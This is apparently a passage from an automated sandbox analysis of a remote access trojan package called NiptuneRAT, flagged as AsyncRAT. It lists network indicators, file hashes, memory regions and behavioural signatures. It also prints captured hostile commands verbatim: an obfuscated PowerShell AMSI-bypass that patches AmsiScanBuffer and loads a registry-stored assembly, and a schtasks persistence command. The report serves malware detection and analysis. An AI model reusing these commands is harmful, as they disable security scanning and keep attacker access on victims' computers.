ard,$HTNynACjESgbSk).SetImplementationFlags(''+'R'+''+[Char](117)+''+'n'+''+[Char](116)+'i'+'m'+''+[Char](101)+''+[Char](44)+''+'M'+''+'a'+''+'n'+''+[Char](97)+''+[Char](103)+''+'e'+''+[Char](100)+'');$svPFHJRydKw.DefineMethod(''+[Char](73)+''+[Char](110)+''+[Char](118)+''+[Char](111)+''+'k'+'e',''+[Char](80)+''+[Char](117)+''+[Char](98)+''+'l'+'i'+[Char](99)+','+[Char](72)+''+[Char](105)+''+'d'+'e'+[Char](66)+'ySig'+[Char](44)+''+[Char](78)+''+[Char](101)+''+[Char](119)+''+'S'+''+[Char](108)+''+[Char](111)+'t,'+[Char](86)+'i'+[Char](114)+''+[Char](116)+'u'+'a'+''+'l'+'',$VUapLZDwuA,$HTNynACjESgbSk).SetImplementationFlags(''+[Char](82)+''+[Char](117)+''+'n'+'t'+[Char](105)+''+[Char](109)+'e'+[Char](44)+''+'M'+''+[Char](97)+''+[Char](110)+'a'+'g'+''+[Char](101)+''+[Char](100)+'');Write-Output $svPFHJRydKw.CreateType();}$rSoNzsfqtPNwC=([AppDomain]::CurrentDomain.GetAssemblies()|Where-Object{$_.GlobalAssemblyCache -And $_.Location.Split('\')[-1].Equals(''+[Char](83)+''+'y'+'s'+[Char](116)+''+[Char](101)+'m'+[Char](46)+''+'d'+''+[Char](108)+''+'l'+'')}).GetType(''+[Char](77)+''+'i'+''+[Char](99)+'r'+[Char](111)+'s'+[Char](111)+''+[Char](102)+''+'t'+''+[Char](46)+''+[Char](87)+'in3'+'2'+''+[Char](46)+''+'U'+''+'n'+''+[Char](115)+''+[Char](97)+''+[Char](102)+''+'e'+''+[Char](78)+'at'+[Char](105)+''+[Char](118)+''+[Char](101)+''+'M'+''+[Char](101)+''+[Char](116)+''+[Char](104)+''+[Char](111)+'ds');$SEhCBgwbBYuhRD=$rSoNzsfqtPNwC.GetMethod(''+[Char](71)+''+[Char](101)+''+'t'+''+[Char](80)+''+[Char](114)+''+[Char](111)+''+[Char](99)+''+'A'+''+[Char](100)+''+[Char](100)+''+[Char](114)+''+[Char](101)+''+[Char](115)+''+'s'+'',[Reflection.BindingFlags](''+[Char](80)+''+[Char](117)+''+'b'+'li'+[Char](99)+','+[Char](83)+'t'+[Char](97)+''+[Char](116)+''+'i'+''+[Char](99)+''),$Null,[Reflection.CallingConventions]::Any,@((New-Object IntPtr).GetType(),[string]),$Null);$OEZyTvETbOlFWBLYBao=FmDvVBkCFmNM @([String])([IntPtr]);$MmIGJVbffZIQsZzfFyzPEY=FmDvVBkCFmNM @([IntPtr],[UIntPtr],[UInt32],[UInt32].MakeByRefType())([Bool]);$iZqFqXMPixY=$rSoNzsfqtPNwC.GetMethod(''+'G'+''+[Char](101)+''+[Char](116)+''+'M'+''+[Char](111)+''+'d'+''+'u'+''+[Char](108)+''+[Char](101)+'Han'+[Char](100)+''+'l'+''+[Char](101)+'').Invoke($Null,@([Object](''+[Char](107)+''+'e'+''+[Char](114)+''+'n'+''+[Char](101)+''+[Char](108)+'32'+[Char](46)+'d'+'l'+''+'l'+'')));$DIKOvfvTMYXWPH=$SEhCBgwbBYuhRD.Invoke($Null,@([Object]$iZqFqXMPixY,[Object]('L'+'o'+'a'+'d'+''+'L'+''+[Char](105)+''+'b'+''+[Char](114)+'a'+'r'+'y'+[Char](65)+'')));$DPSAFRPwolNENAHkq=$SEhCBgwbBYuhRD.Invoke($Null,@([Object]$iZqFqXMPixY,[Object]('V'+[Char](105)+''+[Char](114)+''+'t'+''+'u'+''+[Char](97)+'l'+[Char](80)+''+[Char](114)+'o'+'t'+''+[Char](101)+''+'c'+''+[Char](116)+'')));$MpOZCuT=[Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($DIKOvfvTMYXWPH,$OEZyTvETbOlFWBLYBao).Invoke(''+'a'+''+[Char](109)+''+[Char](115)+''+[Char](105)+''+[Char](46)+''+[Char](100)+'ll');$YwEVUxYEuFWntIEUg=$SEhCBgwbBYuhRD.Invoke($Null,@([Object]$MpOZCuT,[Object](''+[Char](65)+''+[Char](109)+''+[Char](115)+''+[Char](105)+''+[Char](83)+''+'c'+'a'+[Char](110)+''+[Char](66)+''+[Char](117)+'f'+[Char](102)+''+'e'+'r')));$yBKdqcFeiQ=0;[Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($DPSAFRPwolNENAHkq,$MmIGJVbffZIQsZzfFyzPEY).Invoke($YwEVUxYEuFWntIEUg,[uint32]8,4,[ref]$yBKdqcFeiQ);[Runtime.InteropServices.Marshal]::Copy([Byte[]](0xb8,0x57,0,7,0x80,0xc3),0,$YwEVUxYEuFWntIEUg,6);[Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($DPSAFRPwolNENAHkq,$MmIGJVbffZIQsZzfFyzPEY).Invoke($YwEVUxYEuFWntIEUg,[uint32]8,0x20,[ref]$yBKdqcFeiQ);[Reflection.Assembly]::Load([Microsoft.Win32.Registry]::LocalMachine.OpenSubkey(''+[Char](83)+'OF'+'T'+'WA'+'R'+''+[Char](69)+'').GetValue(''+[Char](36)+''+[Char](55)+''+[Char](55)+''+'s'+''+[Char](116)+'a'+[Char](103)+'er')).EntryPoint.Invoke($Null,$Null)"

C:\Windows\System32\dllhost.exe

C:\Windows\System32\dllhost.exe /Processid:{4f8ebf90-14cd-4bc7-b0be-fa6d0271da55}

C:\Windows\System32\schtasks.exe

"C:\Windows\System32\schtasks.exe" /create /f /RL HIGHEST /sc minute /mo 1 /tn "$77TCPSVCS" /tr "C:\Users\Admin\AppData\Roaming\$77TCPSVCS.EXE"

C:\Windows\system32\dwm.exe

"dwm.exe"

C:\Users\Admin\AppData\Roaming\$77TCPSVCS.EXE

C:\Users\Admin\AppData\Roaming\$77TCPSVCS.EXE

Network

Country Destination Domain Proto
US 8.8.8.8:53 64.159.190.20.in-addr.arpa udp
US 8.8.8.8:53 0.205.248.87.in-addr.arpa udp
US 8.8.8.8:53 g.bing.com udp
US 204.79.197.200:443 g.bing.com tcp
US 8.8.8.8:53 97.17.167.52.in-addr.arpa udp
US 8.8.8.8:53 200.197.79.204.in-addr.arpa udp
US 8.8.8.8:53 95.221.229.192.in-addr.arpa udp
US 8.8.8.8:53 tse1.mm.bing.net udp
US 204.79.197.200:443 tse1.mm.bing.net tcp
US 204.79.197.200:443 tse1.mm.bing.net tcp
US 204.79.197.200:443 tse1.mm.bing.net tcp
US 204.79.197.200:443 tse1.mm.bing.net tcp
US 204.79.197.200:443 tse1.mm.bing.net tcp
US 8.8.8.8:53 9.228.82.20.in-addr.arpa udp
US 8.8.8.8:53 26.165.165.52.in-addr.arpa udp
US 8.8.8.8:53 41.110.16.96.in-addr.arpa udp
US 8.8.8.8:53 217.106.137.52.in-addr.arpa udp
US 8.8.8.8:53 18.31.95.13.in-addr.arpa udp
US 8.8.8.8:53 100.5.17.2.in-addr.arpa udp
US 20.231.121.79:80 tcp
US 8.8.8.8:53 119.110.54.20.in-addr.arpa udp
US 8.8.8.8:53 217.135.221.88.in-addr.arpa udp
US 8.8.8.8:53 187.178.17.96.in-addr.arpa udp
US 8.8.8.8:53 42.134.221.88.in-addr.arpa udp
US 8.8.8.8:53 174.178.17.96.in-addr.arpa udp
US 8.8.8.8:53 199.178.17.96.in-addr.arpa udp
US 8.8.8.8:53 240.221.184.93.in-addr.arpa udp
US 8.8.8.8:53 173.178.17.96.in-addr.arpa udp
US 8.8.8.8:53 13.227.111.52.in-addr.arpa udp
US 8.8.8.8:53 137.71.105.51.in-addr.arpa udp
US 8.8.8.8:53 rentry.co udp
US 172.67.145.129:80 rentry.co tcp
US 172.67.145.129:443 rentry.co tcp
US 8.8.8.8:53 github.com udp
DE 140.82.121.3:443 github.com tcp
US 8.8.8.8:53 raw.githubusercontent.com udp
US 185.199.108.133:443 raw.githubusercontent.com tcp
US 8.8.8.8:53 129.145.67.172.in-addr.arpa udp
US 8.8.8.8:53 3.121.82.140.in-addr.arpa udp
US 8.8.8.8:53 133.108.199.185.in-addr.arpa udp
N/A 127.0.0.1:1337 tcp
US 172.67.145.129:443 rentry.co tcp
US 147.185.221.18:36538 tcp
US 8.8.8.8:53 18.221.185.147.in-addr.arpa udp

Files

C:\Users\Admin\Desktop\NiptuneRAT-main\NiptuneRAT.exe

MD5 c52733885f1aa485683b9289c4b45519
SHA1 07c3faeb48670485bbefa9e3c35fc24da4f9411a
SHA256 ca9dcd616882b3031c86f962b5cce07187a8a513d183b4f68d897d5687d45bd7
SHA512 5fe1f30b412459cc5d71cd426c2bba9265e6c8f4ade5ddda052fe231ca4e036598c873c40441045abe591b8fcc6e850c2d691b179e44f02f3ce23d0effa4a5c2

C:\Users\Admin\Desktop\NiptuneRAT-main\NiptuneRAT.exe

MD5 a6bf33461f36b6cc60df311818e13f16
SHA1 a18d8aec012db8d2b247b618087c860e134c7a57
SHA256 7fb89d4f209ac6c6089783a2258a1b45d40686fb7624ad835263724e10477961
SHA512 7faad74edc9282f3410fd3edcc8bedd4cba28fbb768b5c24cafa761503c7408b394296e905739f0105b76cde4fa24512cb2ea5610f4637a25de19f1792766ac0

C:\Users\Admin\Desktop\NiptuneRAT-main\NiptuneRAT.exe.config

MD5 465c8716dc52edeaf09f0c61fc988934
SHA1 9cab6cec5f46d7528323fa2ad7aa2fc1a72d689b
SHA256 1c6051caeecdd3eeb78cad1b1efa60e56be4193d76f5718c73b8fdfcd61784c5
SHA512 0b386615940f254d6a7dd5650fc7da6544beab97d821bab8fe915dcc257729919142bbd6680b06a19f57c8c79c2c04368413fc31a7efef8e9248209f81c1cf3c

memory/3600-163-0x00007FFD732B0000-0x00007FFD73D71000-memory.dmp

memory/3600-164-0x00000189D49D0000-0x00000189D62FA000-memory.dmp

memory/3600-165-0x00000189D8030000-0x00000189D8040000-memory.dmp

memory/3600-166-0x00000189F07E0000-0x00000189F0A32000-memory.dmp

memory/3600-167-0x00000189F0E50000-0x00000189F1044000-memory.dmp

memory/3600-168-0x00000189F1400000-0x00000189F154E000-memory.dmp

memory/3600-169-0x00000189F1590000-0x00000189F15A4000-memory.dmp

memory/3600-170-0x00000189D8030000-0x00000189D8040000-memory.dmp

memory/3600-171-0x00000189FAB20000-0x00000189FB108000-memory.dmp

memory/3600-172-0x00000189D8030000-0x00000189D8040000-memory.dmp

memory/3600-173-0x00000189FA310000-0x00000189FA31A000-memory.dmp

memory/3600-174-0x00000189D8030000-0x00000189D8040000-memory.dmp

memory/3600-175-0x00000189F1A30000-0x00000189F1A42000-memory.dmp

memory/3600-176-0x00000189F1A50000-0x00000189F1CD0000-memory.dmp

C:\Users\Admin\Desktop\NiptuneRAT-main\Plugins\Tools\NiptuneGrabber.exe

MD5 89974f21c462ad66165c03cc05a9b8a7
SHA1 868b45d89fced9bf5cdc3e86e8eeb0698262deb4
SHA256 9f61591699d7d9e3336bbe924e7826c1e8bedb7227045705d50eec264b1202ec
SHA512 7348faa61700741733da0b80fdb824366a7cb7d841c24d78d54971ba1d0fbe899f257f0c68792db5c1e05ca3afb4e6fbd251f8d369c903e227e9b7eba4f861b3

C:\Users\Admin\Desktop\NiptuneRAT-main\Plugins\Tools\NiptuneGrabber.exe.config

MD5 0c02012f18e2755ce1bfaa8c81abe14e
SHA1 b10ef760340682f09360019ddca35a2bc0eef3e1
SHA256 93b3433679ee8d782f69e37136e207bd5e125f1ef79542bf9d7e84c1c84feea5
SHA512 c1ad192d040288433b5a618720de46199c94c71b17c8365a16aa7180179c7efbc8ff77e590c1dcfc1e8d6caa1223446b9458663f5dc7ccd861ee3afb6bc99787

memory/3600-190-0x00007FFD732B0000-0x00007FFD73D71000-memory.dmp

memory/4896-191-0x0000027CF7410000-0x0000027CF74E6000-memory.dmp

memory/4896-195-0x0000027CF9210000-0x0000027CF9230000-memory.dmp

memory/4896-196-0x00007FFD732B0000-0x00007FFD73D71000-memory.dmp

memory/4896-198-0x0000027CF9230000-0x0000027CF9250000-memory.dmp

memory/3600-201-0x00000189D8030000-0x00000189D8040000-memory.dmp

memory/4896-200-0x0000027CF9AF0000-0x0000027CF9B0E000-memory.dmp

memory/4896-204-0x0000027CF9C80000-0x0000027CF9CEE000-memory.dmp

memory/4896-206-0x0000027CF9F10000-0x0000027CFA124000-memory.dmp

memory/4896-202-0x0000027CF9AE0000-0x0000027CF9AF0000-memory.dmp

memory/4896-208-0x0000027CFA360000-0x0000027CFA3BA000-memory.dmp

memory/4896-210-0x0000027CFA310000-0x0000027CFA31E000-memory.dmp

memory/4896-213-0x0000027CFB100000-0x0000027CFB24A000-memory.dmp

memory/4896-214-0x0000027CFAFB0000-0x0000027CFB0C6000-memory.dmp

memory/4896-215-0x0000027CF9AB0000-0x0000027CF9AE0000-memory.dmp

memory/3600-217-0x00000189D8030000-0x00000189D8040000-memory.dmp

memory/4896-218-0x0000027CF9AE0000-0x0000027CF9AF0000-memory.dmp

memory/4896-219-0x0000027CF9AE0000-0x0000027CF9AF0000-memory.dmp

memory/3600-220-0x00000189D8030000-0x00000189D8040000-memory.dmp

memory/4896-222-0x00007FFD732B0000-0x00007FFD73D71000-memory.dmp

memory/3600-223-0x00000189D8030000-0x00000189D8040000-memory.dmp

C:\Users\Admin\Desktop\NiptuneRAT-main\Plugins\Tools\NiptuneBinder.exe

MD5 ab9b9dac5c176d3f525400aa7b58a078
SHA1 c7b22490b94d46ed0287c4b6ece08e96e7103516
SHA256 6d9da9ac899fdac6a9436922be389ef3bd124f4657fea6332c2ccd3fc33613d4
SHA512 649032f0046778fa63e7878ade222de7a061162b6da4670970ace517d2c2212f80dff2fd5a5f2d9c25324a89c5af0927022c1ec24f726da92a669cd232b8ec16

memory/1560-226-0x00007FFD6B680000-0x00007FFD6C021000-memory.dmp

memory/1560-227-0x0000000000F80000-0x0000000000F90000-memory.dmp

memory/1560-228-0x000000001BC10000-0x000000001C0DE000-memory.dmp

memory/1560-229-0x00007FFD6B680000-0x00007FFD6C021000-memory.dmp

memory/1560-230-0x000000001B5F0000-0x000000001B68C000-memory.dmp

memory/1560-231-0x0000000000FD0000-0x0000000000FD8000-memory.dmp

memory/1560-232-0x0000000000F80000-0x0000000000F90000-memory.dmp

memory/1560-234-0x0000000000F80000-0x0000000000F90000-memory.dmp

memory/1560-235-0x00007FFD6B680000-0x00007FFD6C021000-memory.dmp

memory/3600-236-0x00000189D8030000-0x00000189D8040000-memory.dmp

memory/3600-237-0x00000189FE3B0000-0x00000189FE4CE000-memory.dmp

C:\Users\Admin\Desktop\NiptuneRAT-main\Stub\Stub.exe

MD5 0da861f192f8e722505826c141c05a40
SHA1 4d717f9d2a64caf68374ed1e246cf38dd208227b
SHA256 4c6a73271e3a0794bff16fa39b45771e9e39b873e12fdc7031e03fbda238667b
SHA512 7b61ac15ba95e0b8a9ebac2f33e7137083b18204de503e7a2946af65e9d5b6ad9e826a27770e10862dc825f3e20e8bd72463593528a623c4603f9628f8c27280

C:\Users\Admin\Desktop\NiptuneRAT-main\Usrs.p12

MD5 87f8c46f0f27b967b543ab554c061dbd
SHA1 78c88f30a8c3638b9c61d4c8044a9e4f8d7b00d3
SHA256 adf158702858e96c9003d5ab5115c6a1e71cdce8a82377e0d6c6e63edfb52239
SHA512 b289e2cf36684dad0f47cacd8716582e176ad71720f7a00fc508ec6eeb0266cdfcf58c7c62cddf4e0a03dc0fbe60e3a9c76da820eccf73f8c9a669252c17422c

C:\Users\Admin\AppData\Local\NiptuneRAT\NiptuneRAT.exe_Url_2virb1mjsp4und03eye3evhna3xsy40a\4.1.0.0\user.config

MD5 77d636e08fe9de62cf19ad656409ccde
SHA1 827de958d0c46346c9c581be646b8c3a61fab648
SHA256 4155b94bb3ef65ff1f15d7f337f2ada62d474ec5ba7557562618e5206e83a558
SHA512 60712d620a884d897457f56d4ecc758c9a753c31f58fcb9d814af58dbc2e105435c9a73f837b4146e2e8edb7834b83f51dcecaaf39cd6f69be59d7bb5c28b839

C:\Users\Admin\AppData\Local\NiptuneRAT\NiptuneRAT.exe_Url_2virb1mjsp4und03eye3evhna3xsy40a\4.1.0.0\user.config

MD5 67ae3b067855a1e16f01e16ee389c8f0
SHA1 3bef83c7922cda26497a45bbfe209e65b14234a0
SHA256 07e9e4841eeace951264cf7b4cf5e8c6993fc923b851cb2360122fe7fec2ef0a
SHA512 db73d3a4a9523db12264d1cf53e50d44589af8dc83bdbb041eff8977f6134666d1836014ebde472039036a13beabe6adee026712f385453ed654ae5ac504e699

C:\Users\Admin\Desktop\$77NiptuneClient.exe

MD5 9a545e9134023055aa55309e62f77a80
SHA1 8f663c9816f8610676f4fc101cb6f31c21117d47
SHA256 75bbbbeca7b8b6831e6bd91b7b7256c30a50de3369965f1866434a924f4c362e
SHA512 d5d4dd237a03218d7c95f14160151e41adb89dd26192114efd9cc2b915e5fc006f2f4e2bf859c6cc1246f0584aa5f344d6b9525f3d31650719e8d4b66d838526

memory/2396-272-0x0000000000510000-0x0000000000526000-memory.dmp

memory/3600-273-0x00000189D8030000-0x00000189D8040000-memory.dmp

memory/2396-274-0x00007FFD732B0000-0x00007FFD73D71000-memory.dmp

memory/2396-275-0x000000001B2F0000-0x000000001B300000-memory.dmp

memory/2396-276-0x00007FFD948D0000-0x00007FFD94AC5000-memory.dmp

memory/2396-281-0x00007FFD732B0000-0x00007FFD73D71000-memory.dmp

memory/2396-282-0x00007FFD948D0000-0x00007FFD94AC5000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\tmpD3B1.tmp.bat

MD5 7352cc373f53964e85cee69d5e6a96d5
SHA1 267c8a9098dd1d4842f052126ea14b1f7fc8c973
SHA256 4397f51ac52f558c35fa9181fe7519cdef892bf26d99af375fff5f50cdaaa346
SHA512 78826b32baa2c2c5eec0ffbe3f0c65dfc5cf9b270f4ce0174bda794a2c881858fd1ee0a7fba10af952ee3e14609095c2b24046dc6575de9dcddf513d4e4d2c73

memory/3304-284-0x0000025878860000-0x0000025878882000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_nm1hmjww.bcx.ps1

MD5 d17fe0a3f47be24a6453e9ef58c94641
SHA1 6ab83620379fc69f80c0242105ddffd7d98d5d9d
SHA256 96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
SHA512 5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

memory/3304-294-0x00007FFD732B0000-0x00007FFD73D71000-memory.dmp

memory/3304-295-0x00000258787E0000-0x00000258787F0000-memory.dmp

memory/3304-296-0x00000258787E0000-0x00000258787F0000-memory.dmp

memory/3304-297-0x0000025879020000-0x00000258791E2000-memory.dmp

memory/2320-308-0x0000017424DB0000-0x0000017424DC0000-memory.dmp

memory/2320-309-0x0000017424DB0000-0x0000017424DC0000-memory.dmp

memory/2320-307-0x00007FFD732B0000-0x00007FFD73D71000-memory.dmp

memory/2320-310-0x0000017425C40000-0x0000017426168000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\$77APCONSVC.EXE

MD5 0ccb78c036b77af2a02939c10863d0fc
SHA1 77b58cc239c67abf271a7e68c10592a8a4d5bae1
SHA256 555e0c40af959eb3c9be32197ebf39aea443fe672086e004cc0141296de67d7a
SHA512 29f194f6118f558a31515538d758934d59959a9aeed1a2ae9e929b762166843a4433b10b0f5ded0698c141d36fc12ae54860ecbb8d36ba6ca2f92cb946f39a5c

memory/2320-324-0x00000174250C0000-0x000001742520E000-memory.dmp

memory/4656-325-0x0000000000840000-0x0000000000874000-memory.dmp

memory/2320-326-0x00007FFD732B0000-0x00007FFD73D71000-memory.dmp

C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log

MD5 f62a904508f640cf7a29c69cdda7ed8e
SHA1 79e4bd22e96aa94c783f5521b5b2a549c58ed24f
SHA256 1c68a8d5fb2a3d57a9eaeb1e64cc457f3f4e268a54cbf8aeaf5084fd401e59bc
SHA512 0a5bdaf832544123470af0204145dc38830dbbf0e8b6623b89bbaca5970e5c0506356e4ad9d9a589bd3394768ff949215c3fea2d2542da16ffb60708c0f2c544

memory/3304-334-0x0000025878990000-0x0000025878ADE000-memory.dmp

C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

MD5 12b1823a0956e972f95e397d4ca5a91f
SHA1 1ad092456da4540400fd58788bc40a353b17e295
SHA256 0096655234a74760fbeb882149ad2513be4c9782e1e8ca86968e61b9f88c5230
SHA512 1bd8aa4179650510689ec523492c2327a61095c28266548d89512bc69b5b9b8416023e957a1ddfeefb51de2d403f525ee0535f850147b022568c44197fbcbcde

C:\Users\Admin\AppData\Local\Temp\$77SYSTEM.exe

MD5 152e3f07bbaf88fb8b097ba05a60df6e
SHA1 c4638921bb140e7b6a722d7c4d88afa7ed4e55c8
SHA256 a4623b34f8d09f536e6d8e2f06f6edfb3975938eb0d9927e6cd2ff9c553468fc
SHA512 2fcc3136e161e89a123f9ff8447afc21d090afdb075f084439b295988214d4b8e918be7eff47ffeec17a4a47ad5a49195b69e2465f239ee03d961a655ed51cd4

C:\Users\Admin\AppData\Local\Temp\$77TCPSVCS.EXE

MD5 39b931afd01be1f696c515a83b789445
SHA1 790083c555276c9cca5bf7a9532fd99f79b80a90
SHA256 e9db26ffe8f05c133a7c541ccd7eafa63b64806a84e4e5866fc735e5dc4ab93d
SHA512 0961ea8fa2b23f2c2631db074a2271d37bec1844496796ec116c649245423b7e7da29b9a626c3c6406a65f9812550f09f089babee9fe805dcf311f6d7bda9592

memory/4936-376-0x00007FFD948D0000-0x00007FFD94AC5000-memory.dmp

memory/4936-377-0x00007FFD93D10000-0x00007FFD93DCE000-memory.dmp

memory/3728-382-0x0000000140000000-0x0000000140008000-memory.dmp

memory/3728-384-0x0000000140000000-0x0000000140008000-memory.dmp

memory/3728-380-0x0000000140000000-0x0000000140008000-memory.dmp

memory/3728-379-0x0000000140000000-0x0000000140008000-memory.dmp

memory/3728-378-0x0000000140000000-0x0000000140008000-memory.dmp

memory/3728-385-0x00007FFD948D0000-0x00007FFD94AC5000-memory.dmp

memory/3728-387-0x00007FFD93D10000-0x00007FFD93DCE000-memory.dmp

memory/4936-389-0x000001BEFBB50000-0x000001BEFBC9E000-memory.dmp

memory/3728-390-0x0000000140000000-0x0000000140008000-memory.dmp

memory/620-393-0x0000024140D40000-0x0000024140D65000-memory.dmp

memory/620-395-0x0000024140D70000-0x0000024140D9B000-memory.dmp

memory/620-396-0x0000024140D70000-0x0000024140D9B000-memory.dmp

memory/620-405-0x00007FFD54950000-0x00007FFD54960000-memory.dmp

memory/620-404-0x0000024140D70000-0x0000024140D9B000-memory.dmp

memory/676-411-0x000001D8F01B0000-0x000001D8F01DB000-memory.dmp

memory/952-422-0x000001A5D9FA0000-0x000001A5D9FCB000-memory.dmp

memory/676-431-0x000001D8F01B0000-0x000001D8F01DB000-memory.dmp

memory/388-430-0x000002A8F8180000-0x000002A8F81AB000-memory.dmp

memory/676-437-0x00007FFD54950000-0x00007FFD54960000-memory.dmp

memory/908-445-0x000001D4ED7B0000-0x000001D4ED7DB000-memory.dmp

C:\Users\Admin\Desktop\NiptuneRAT-main\Plugins\G3nl0mDcABnDuZ.dll

MD5 97b8bec4c47286e333cc2bedacf7338e
SHA1 764bbd0307924b71ca89538b42996208d10c9b91
SHA256 060d467cbeb0a58696287c052f3dd9b3597331b1c812e3e2882d6c232f8511de
SHA512 a40970622a594533349e75fc2022314ba21f05fc82709d6eaba82f4a2bc343c960029ad2825cfc034ce82622722127d149993bff88982f02d6dd6b5b1fb60fbf

C:\Users\Admin\Desktop\NiptuneRAT-main\Plugins\FBSyChwp.dll

MD5 0d41ccfaa8e7ef96248b8270d1a44d08
SHA1 6ee22bdb91d3a18e0b45b6590eb69bc9a0b02326
SHA256 0ea38d0d964815e2b84748a78bd5a829ae01586478e5f17b976f1ae763c8dec3
SHA512 a0f236f6dbeb1763fb1c198616de65b907a3a5edf7ed9435c2ad0b5826d84e9d2f25e96aba4e8b681ef495612cf0e04e929427a92d332164ace89e797bcb0e0e

C:\Users\Admin\Desktop\NiptuneRAT-main\Plugins\EVa7gBMKoaHmLC.dll

MD5 64a3d908b8a5feff2bccfc67f3a67dbd
SHA1 a17d7e5fa57c99a067cac459cb507b625dac254e
SHA256 6ea1ae7ab496666c0117fc20e704bfb6104b13cfb0408073a09689f863fa64b1
SHA512 66374d720230799bea6ac6cfe3faadc37fd775a49d40c04facae1caf1ec658956bbda54ba75287d7128b19b97971bd933a64469da8e0884225c5a8d8b9423ccc

C:\Users\Admin\Desktop\NiptuneRAT-main\Plugins\Audio.dll

MD5 8105f5149e1fea72e27f0a1455d956bc
SHA1 6722d54df38b89284c3375efda3985155e6f5b8e
SHA256 9b73be7a27b5aa8cabf10c79a6e515db6b59962cad3945dada2eff57bb56bfdf
SHA512 4f1aaa81263bb17aa7b495cab056fd9b18058247df874866bd9cb6247f180989a0d549ce0b4595c7a636e4d6279e92004c4f159c30e8b381a1a51b9d54a84d10

C:\Users\Admin\Desktop\NiptuneRAT-main\Plugins\59Zp7paEHDF7luJ.dll

MD5 86cbe0f36426982c534746743f4a4dfe
SHA1 04dd3bf828b36ae75bfda0edc67693b59801e9b5
SHA256 972261dfbdd76a5b99d2922a018c5c809ddb195c4f44312bb1da496c9c28df44
SHA512 1cd164585caa0c5f64e567d24f9e4f9c4a4f79fb1e8da83ef8a635d6ad5e2f6ebcf2c813371b4cd53ea94e0d36f8a04fa2b2acf3f35570ff57450d6503fc31a4

C:\Users\Admin\Desktop\NiptuneRAT-main\Plugins\0guo3zbo66fqoG.dll

MD5 e4ebcf76ff80ef398d3ab77d577f4c08
SHA1 cb9e6b30a63d50ae87610f6855b64abfb25691d2
SHA256 9661b1abc9a3e95e591c49c3838a64a066a2ff3c6de08d8aa7b541c4a75cd8e5
SHA512 8f37cedd987dd14181fdfa861b8a95271868dac21aa9df80bd6daa831ae20f4b4965c8be3e36f32aa220bd37ded11a7568ae237c9c9641bb4fc087f6fe104b01

C:\Users\Admin\AppData\Local\Temp\Log.tmp

MD5 3e79e497a1c8dff282c0e281a8ac4238
SHA1 ca25ecd92033c4789f61dbbd0e782eac581a091c
SHA256 edadb040867aacdc83bad794bdd55232320bb00ee4957b2217da614b26f158ea
SHA512 98cff43d464e17f18f7252f80e3f1105f4f048f83895ddca2e72c0b77dbe406ec104939737841e71eeb005e4ac83f7b6fb3789b115e2b0d91d78662009fe33d6

Analysis: behavioral4

Detonation Overview

Submitted

2024-03-17 21:41

Reported

2024-03-17 21:52

Platform

win11-20240221-en

Max time kernel

440s

Max time network

454s

Command Line

C:\Windows\Explorer.exe /idlist,,C:\Users\Admin\AppData\Local\Temp\NiptuneRAT-main.zip

Signatures

AsyncRat

rat asyncrat

Contains code to disable Windows Defender

Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A

Async RAT payload

rat
Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A

Grants admin privileges

Executes dropped EXE

Description Indicator Process Target
N/A N/A C:\Users\Admin\Desktop\NiptuneRAT-main\NiptuneRAT.exe N/A
N/A N/A C:\Users\Admin\Desktop\$77NiptuneClient.exe N/A

Launches sc.exe

Description Indicator Process Target
N/A N/A C:\Windows\system32\sc.exe N/A

Enumerates physical storage devices

Enumerates processes with tasklist

Description Indicator Process Target
N/A N/A C:\Windows\system32\tasklist.exe N/A

Gathers network information

Description Indicator Process Target
N/A N/A C:\Windows\system32\ipconfig.exe N/A
N/A N/A C:\Windows\system32\NETSTAT.EXE N/A
N/A N/A C:\Windows\system32\ipconfig.exe N/A

Gathers system information

Description Indicator Process Target
N/A N/A C:\Windows\system32\systeminfo.exe N/A

Modifies registry class

Description Indicator Process Target
Set value (int) \REGISTRY\USER\S-1-5-21-647252928-2816094679-1307623958-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\9\ComDlg\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\LogicalViewMode = "1" C:\Windows\system32\OpenWith.exe N/A
Set value (int) \REGISTRY\USER\S-1-5-21-647252928-2816094679-1307623958-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\4\ComDlg\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\GroupView = "0" C:\Users\Admin\Desktop\NiptuneRAT-main\NiptuneRAT.exe N/A
Set value (int) \REGISTRY\USER\S-1-5-21-647252928-2816094679-1307623958-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\5\ComDlg\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\GroupByDirection = "1" C:\Users\Admin\Desktop\NiptuneRAT-main\NiptuneRAT.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-647252928-2816094679-1307623958-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\8\ComDlg\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\GroupByKey:FMTID = "{00000000-0000-0000-0000-000000000000}" C:\Windows\system32\OpenWith.exe N/A
Set value (int) \REGISTRY\USER\S-1-5-21-647252928-2816094679-1307623958-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\1\0\2\NodeSlot = "9" C:\Windows\system32\OpenWith.exe N/A
Key created \REGISTRY\USER\S-1-5-21-647252928-2816094679-1307623958-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\9\ComDlg C:\Windows\system32\OpenWith.exe N/A
